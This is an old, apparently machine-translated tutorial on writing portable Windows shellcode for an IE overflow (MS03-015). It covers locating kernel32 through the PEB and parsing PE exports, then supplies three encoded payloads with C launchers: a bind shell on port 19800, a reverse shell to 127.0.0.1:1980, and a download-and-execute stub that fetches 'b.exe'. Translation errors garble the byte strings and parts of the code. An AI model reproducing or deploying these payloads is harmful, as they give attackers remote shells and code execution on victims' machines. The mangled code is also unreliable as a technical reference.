[Principle] shellcode Writing Technology

Shellcode compilation technology

Created:
Article attributes: original
Article submission: Jeno (xxgchappy_at_vip.sina.com)

By Jeno
Email: jeno@vip.371.net
Time: 2003-8-31

Title: Shellcode Compiling Technology

Debugging http://www.microsoft.com/technet/security/bulletin/MS03-015.asp some days ago
I encountered an annoyance, that is, I got the right to execute code by overwriting EIP or Seh,
Currently, the popular shellcode on the Internet cannot meet my requirements, mainly in the following aspects:
1. It is not common. Generally, it can only run in Win2000, but rarely run in WINXP or win2003.
2. I didn't handle the program exit issue. I ended the IE exception when ie overflows.
3. Some codes are too long and even exceed 1000 bytes.
4. It may be unavailable in different language environments.

For the above four reasons, I plan to write a general shellcode for use. In fact, shellcode is not universal, and the most important thing is
After reading the shellcode written by many people, I think it is not very good because most of them use the method of finding the address in peb.
Get the address of Kernel32, and then have the ASCII code you need for the function at the end of shellcode. Find the address by searching for memory,
Let me explain why we can find the Kernel32 address in peb:
1. FS points to the Teb Structure
2. Point to the peb structure at Teb + 0x30
3. Point to the peb_ldr_data structure in peb + 0x0c
4. In peb_ldr_data + 0x1c, It is the address of some dynamic connection libraries. For example, if the first one points to the second one of NTDLL. dll
Is the address of kernel32.dll we need

The following is the assembly code
MoV eax, FS: 0x30
MoV eax, [eax + 0x0c]
MoV ESI, [eax + 0x1c]
Lodsd
MoV EBP, [eax + 0x08] // EBP is the address of kernel32.dll.

Generally, the shellcode method for obtaining a function is expressed as follows in assembly:

Search_function:

INC EBX
CMP [EBX], DL
JNE no_zero
INC ECx
No_zero:
CMP [EBX], dword ptr 'pteg'
JNE no_match
CMP [EBX + 4], dword ptr 'ac'
JNE no_match
Je search_complete
No_match:
JMP search_function

In EBX, ESI: 0 is usually a base address.
Such as DB 0ffh, 0ffh, 0e8h, 077 h; specify the kernel base @ 77e60000h
This is the main cause of general unavailability of shellcode (fixed address)

In order to achieve the general purpose, we must analyze the PE file format. The following method is obtained through analysis:
Obtain the function address from pe edt.
1. PE Header offset = kernel32.dll base address + 0x3c;
2. Exports directory offset = kernel32.dll base address + PE Header Offset + 120;
3. Exports directory table = kernel32.dll base address + Exports directory offset;
4. Name pointers table = exports directory table + 32;
5. Then compare the name of the function in the name pointers table (you can compare the name by name or compare the hash value by name hash)
6. ordinals table = exports directory table + 36
7. ordinals table points to the function address, so the function address is found through ordinals table based on the corresponding serial number.

Compile the search code
MoV EBP, [somewhere] kernel32.dll base address
MoV eax, [EBP + 0x3c] eax = PE Header offset
MoV edX, [EBP + eax + 120]
Add edX, EBP edX = exports directory table
MoV ECx, [edX + 24] ECx = number of name pointers
MoV EBX, [edX + 32]
Add EBX, ebp ebx = Name pointers table
Dec ECx
MoV ESI, [EBX + ECx * 4]
Add ESI and ebp esi point to name pointer
You can search for it by yourself!

TIPS:
1. It is best to add wairforsingleobject when writing network shellcode again.
2. Do not forget exitprocess to avoid many program errors.
3. Do not have 0a after the code passes xor99, because in IE overflow, 0a is converted to 0d0a, which will be shortened during string copy.
Let's write this! I hope you will be inspired!

The following three general shellcodes are provided:

1. bindport 19800

# Include <Winsock. h>
# Include <stdio. h>
# Pragma comment (Lib, "ws2_32.lib ")
# Define scport 19800
// Don't change the offset

# Derefined port_offset 251
Unsigned char jeno_bindport19800_ SC [] =
"/Xeb/x10/x5b/x4b/x33/xc9/x66/xb9/xd9/x01/X80/x34/x0b/x99/xe2/xfa"
"/Xeb/x05/xe8/xeb/xFF/X18/x75/x19/x99/x99/x99/X12/x6d/x71"
"/Xd5/x98/x99/x99/x10/x9f/x66/xaf/xf1/x17/xd7/x97/x75/x71/xFF/x98"
"/X99/x99/x10/xdf/x91/x66/xaf/xf1/x34/X40/x9c/x57/x71/xce/x98/x99"
"/X99/x10/xdf/x95/xf1/xf5/xf5/x99/x99/xf1/xAA/XAB/xb7/XFD/xf1/xee"
"/Xea/XAB/xc6/XCD/x66/xcf/x91/x10/xdf/x9d/x66/xaf/xf1/xeb/x67/x2a"
"/X8f/x71/XAB/x98/x99/x99/x10/xdf/x89/x66/xaf/xf1/xe7/x41/x7b/xea"
"/X71/Xba/x98/x99/x99/x10/xdf/x8d/x66/XeF/x9d/xf1/X52/x74/X65/xa2"
"/X71/x8a/x98/x99/x99/x10/xdf/x81/x66/XeF/x9d/xf1/X40/x90/x6c/x34"
"/X71/x9a/x98/x99/x99/x10/xdf/x85/x66/XeF/x9d/xf1/X3D/x83/xe9/x5e"
"/X71/x6a/x99/x99/x99/x10/xdf/xb9/x66/XeF/x9d/xf1/X3D/x34/xb7/Cross City"
"/X71/x7a/x99/x99/x99/x10/xdf/xbd/x66/XeF/x9d/xf1/x7c/xd0/x1f/xd0"
"/X71/x4a/x99/x99/x99/x10/xdf/xb1/x66/XeF/x9d/xf1/x7e/xe0/x5f/xe0"
"/X71/x5a/x99/x99/x99/x10/xdf/xb5/xAA/x66/X18/x75/x09/x98/x99/x99"
"/XCD/xf1/x98/x98/x99/x99/x66/xcf/x81/xc9/xc9/xc9/xc9/xd9/xc9/xd9"
"/Xc9/x66/xcf/x85/X12/x41/xce/xf1/x9b/x99/xd4/xc1/X12/x55/xf3"
"/X8f/xc8/xca/x66/xcf/xb9/xce/xca/x66/xcf/xbd/xce/xc8/xca/x66/xcf"
"/Xb1/X12/x49/xf1/xfc/xe1/xfc/x99/xf1/xfa/xf4/XFD/xb7/x10/xFF/xa9"
"/X1a/x75/XCD/x14/xa5/xbd/xAA/x59/xAA/x50/x1a/x58/x8c/x32/x7b/x64"
"/X5f/xdd/xbd/x89/xdd/x67/xdd/xbd/xa5/x67/xdd/xbd/Xa4/x10/XCD/xbd"
"/XD1/x10/XCD/xbd/xd5/x10/XCD/xbd/xc9/x14/xdd/xbd/x89/XCD/xc9/xc8"
"/Xc8/xc8/xd8/xc8/xd0/xc8/xc8/x66/XeF/xa9/xc8/x66/xcf/x89/X12/x55"
"/Xf3/x66/x66/xA8/x66/xcf/x95/X12/x51/xce/x66/xcf/xb5/x66/xcf/x8d"
"/Xcc/xcf/XFD/x38/xa9/x99/x99/x99/x1c/x59/xe1/x95/X12/xd9/x95/X12"
"/Xe9/x85/x34/X12/xf1/x91/x72/x90/X12/xd9/XAD/X12/x31/X21/x99/x99"
"/X99/X12/x5c/xc7/xc4/x5b/x9d/x99/xca/Xcc/xcf/xce/X12/xf5/xbd/x81"
"/X12/xdc/xa5/X12/XCD/x9c/xe1/x9a/x4c/X12/xD3/x81/X12/xc3/xb9/x9a"
"/X44/x7a/XAB/xd0/X12/XAD/X12/x9a/x6c/xAA/x66/X65/xAA/x59/x35/xa3"
"/X5d/xed/x9e/x58/x56/x94/x9a/x61/x72/x6b/xa2/xe5/xbd/x8d/xec/x78"
"/X12/xc3/xbd/x9a/x44/xFF/X12/x95/xd2/X12/xc3/x85/x9a/x44/X12/x9d"
"/X12/x9a/x5c/x72/x9b/xAA/x59/X12/x4c/xc6/xc7/xc4/xc2/x5b/x9d/x99 ";

// Bindport 19800

Int main (INT argc, char ** argv)
{

Wsadata WSA;

Unsigned short port;

Wsastartup (makeword (2, 2), & WSA );
Port = htons (scport) ^ (u_short) 0x9999;
Memcpy (& jeno_bindport19800_ SC [port_offset], & Port, 2 );

(Void (*) (void) & jeno_bindport19800_ SC )();

}

2. Reverse shellcode default connect back 127.0.0.1 1980

# Include <Winsock. h>
# Include <stdio. h>
# Pragma comment (Lib, "ws2_32.lib ")
# Define Scip "127.0.0.1"
# Define scport 1980
// Don't change the offset
# Define ip_offset 201
# Derefined port_offset 208
Unsigned char jeno_connectback_ SC [] =
"/Xeb/x10/x5b/x4b/x33/xc9/x66/xb9/x9f/x01/X80/x34/x0b/x99/xe2/xfa"
"/Xeb/x05/xe8/xeb/xFF/X18/x75/x19/x99/X12/x6d/x71/x8a"
"/X98/x99/x99/x10/x9f/x66/xaf/xf1/x17/xd7/x97/x75/x71/xb4/x98/x99"
"/X99/x10/xdf/x91/x66/xaf/xf1/x34/X40/x9c/x57/x71/x87/x98/x99/x99"
"/X10/xdf/x95/xf1/xf5/xf5/x99/x99/xf1/xAA/XAB/xb7/XFD/xf1/xee/xea"
"/XAB/xc6/XCD/x66/xcf/x91/x10/xdf/x9d/x66/xaf/xf1/xeb/x67/x2a/x8f"
"/X71/X60/x99/x99/x99/x10/xdf/x89/x66/xaf/xf1/xe7/x41/x7b/xea/x71"
"/X73/x99/x99/x99/x10/xdf/x8d/x66/XeF/x9d/xf1/X52/x74/X65/xa2/x71"
"/X43/x99/x99/x99/x10/xdf/x81/x66/XeF/x9d/xf1/X40/x90/x6c/x34/x71"
"/X53/x99/x99/x99/x10/xdf/x85/x66/XeF/x9d/xf1/x75/X60/x33/xf9/x71"
"/X23/x99/x99/x99/x10/xdf/xb9/X18/x75/x09/x98/x99/x99/XCD/xf1/x98"
"/X98/x99/x99/x66/xcf/x81/xc9/xc9/xc9/xc9/xd9/xc9/xd9/xc9/x66/xcf"
"/X85/X12/x41/x72/x9a/x66/xcf/x8d/xf1/xe6/x99/x99/x98/xf1/x9b/x99"
"/X9e/x25/X12/x55/xf3/x89/xc8/xca/x66/xcf/xb9/x1c/x59/xec/x7f/xf1"
"/Xfc/xe1/xfc/x99/xf1/xfa/xf4/XFD/xb7/x10/xFF/xa9/x1a/x5d/x35/x14"
"/Xa5/xbd/xAA/x59/xAA/x50/x19/x86/x72/x32/x7b/x64/x5f/xdd/xbd/x89"
"/Xdd/x67/xdd/xbd/xa5/x67/xdd/xbd/Xa4/x10/xc5/xbd/XD1/x10/xc5/xbd"
"/Xd5/x10/xc5/xbd/xc9/x14/xdd/xbd/x89/XCD/xc9/xc8/xc8/xc8/xf3/x98"
"/Xc8/xc8/x66/XeF/xa9/xc8/x66/xcf/x89/X12/x55/xf3/x66/x66/xA8/x66"
"/Xcf/x95/X12/x51/x72/x16/Xcc/xcf/XFD/x38/xa9/x99/x99/x99/x1c/x59"
"/Xe1/x95/X12/xd9/x95/X12/xe9/x85/x34/X12/xf1/x91/x72/x90/X12/xd9"
"/XAD/X12/x31/X21/x99/x99/x99/X12/x5c/xc7/xc4/x5b/x9d/x99/xca/Xcc"
"/Xcf/xce/X12/xf5/xbd/x81/X12/xdc/xa5/X12/XCD/x9c/xe1/x9a/x4c/X12"
"/XD3/x81/X12/xc3/xb9/x9a/x44/x7a/XAB/xd0/X12/XAD/X12/x9a/x6c/xAA"
"/X66/X65/xAA/x59/x35/xa3/x5d/xed/x9e/x58/x56/x94/x9a/x61/x72/x6b"
"/Xa2/xe5/xbd/x8d/xec/x78/X12/xc3/xbd/x9a/x44/xFF/X12/x95/xd2/X12"
"/Xc3/x85/x9a/x44/X12/x9d/X12/x9a/x5c/x72/x9b/xAA/x59/X12/x4c/xc6"
"/Xc7/xc4/xc2/x5b/x9d/x99 ";

Main ()
{
Wsadata WSA;

Unsigned short port;
Unsigned long IP;

Wsastartup (makeword (2, 2), & WSA );
Port = htons (scport) ^ (u_short) 0x9999;
IP = inet_addr (SCIP) ^ 0x99999999;
Memcpy (& jeno_connectback_ SC [port_offset], & Port, 2 );
Memcpy (& jeno_connectback_ SC [ip_offset], & IP, 4 );

(Void (*) (void) & jeno_connectback_ SC )();

Return 0;
}

3. Download & executeshellcode

# Include <Winsock. h>
# Include <stdio. h>

Unsigned char jeno_downloadfile_ SC [] =

"/Xeb/x10/x5b/x4b/x33/xc9/x66/xb9/x3c/x01/X80/x34/x0b/x99/xe2/xfa"
"/Xeb/x05/xe8/xeb/xFF/Cross/x34/x99/x99/x99/xc3/X12/x6b/xAA"
"/X59/x35/Xa4/x01/x99/x99/x99/xec/x6f/X18/x75/x51/x99/x99/x99/X12"
"/X6d/x10/xcf/xbd/x71/x0c/x99/x99/x99/xAA/x42/x10/x9f/x66/xaf/xf1"
"/X17/xd7/x97/x75/x71/x34/x99/x99/x99/x10/xdf/x91/xf1/xf5/xf5/x99"
"/X99/xf1/xf6/xf7/xb7/XFD/xf1/xec/xeb/xf5/xf4/XCD/x66/xcf/x91/x10"
"/Xdf/x9d/x66/xaf/xf1/xe7/x41/x7b/xea/x71/X11/x99/x99/x99/x10/xdf"
"/X95/x66/xaf/xf1/x01/x67/x13/x97/x71/xe0/x99/x99/x99/x10/xdf/x8d"
"/X66/xaf/xf1/xbc/x29/x66/x5b/x71/xf3/x99/x99/x99/x10/xdf/x81/x66"
"/XeF/x9d/xf1/xaf/x83/xB6/xe9/x71/xc3/x99/x99/x99/x10/xdf/x89/xf3"
"/Xfc/xf1/xea/xb7/xfc/xe1/x10/xFF/x85/x66/XeF/x85/x66/xcf/x81/xAA"
"/X50/xc8/xc8/x66/XeF/x85/x66/XeF/xbd/xc8/x66/xcf/x89/xAA/x50/xc8"
"/X66/XeF/x85/x66/xcf/x8d/x66/xcf/x95/x86/x19/x99/x99/x99/Xcc/xcf"
"/XFD/x38/xa9/x99/x99/x99/x1c/x59/xe1/x95/X12/xd9/x95/X12/xe9/x85"
"/X34/X12/xf1/x91/x72/x90/X12/xd9/XAD/X12/x31/X21/x99/x99/x99/X12"
"/X5c/xc7/xc4/x5b/x9d/x99/xca/Xcc/xcf/xce/X12/xf5/xbd/x81/X12/xdc"
"/Xa5/X12/XCD/x9c/xe1/x9a/x4c/X12/xD3/x81/X12/xc3/xb9/x9a/x44/x7a"
"/XAB/xd0/X12/XAD/X12/x9a/x6c/xAA/x66/X65/xAA/x59/x35/xa3/x5d/xed"
"/X9e/x58/x56/x94/x9a/x61/x72/x6b/xa2/xe5/xbd/x8d/xec/x78/X12/xc3"
"/Xbd/x9a/x44/xFF/X12/x95/xd2/X12/xc3/x85/x9a/x44/X12/x9d/X12/x9a"
"/X5c/x72/x9b/xAA/x59/X12/x4c/xc6/xc7/xc4/xc2/x5b/x9d/x99/x71/x50"
"/X67/x66/x66"
"Http: // 127.0.0.1/B .exe"
"/X98 ";

Main ()
{

(Void (*) (void) & jeno_downloadfile_ SC )();

Return 0;
}

End.